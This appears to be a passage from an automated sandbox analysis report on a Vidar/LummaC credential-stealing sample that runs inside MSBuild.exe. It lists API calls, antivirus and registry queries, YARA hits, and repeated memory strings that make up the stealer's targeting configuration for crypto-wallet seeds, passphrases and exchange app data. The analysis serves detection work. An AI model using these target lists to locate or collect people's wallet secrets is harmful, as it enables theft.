                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,4_2_0042E56F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00427576
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_00428DC4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0042B5E7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0042B580
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_0042B623
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,4_2_0042E6A4
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_00B0A0B0
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetLocaleInfoW,13_2_00B0A1B6
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00B0A285
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,13_2_00B09921
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: EnumSystemLocalesW,13_2_00B01A42
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: EnumSystemLocalesW,13_2_00B09BC3
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: EnumSystemLocalesW,13_2_00B09CA9
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: EnumSystemLocalesW,13_2_00B09C0E
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00B09D34
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetLocaleInfoW,13_2_00B01EEC
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetLocaleInfoW,13_2_00B09F87
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006176BF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006176BF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,4_2_00410C53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_00410D2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: .*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                          Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: .*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: .*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia 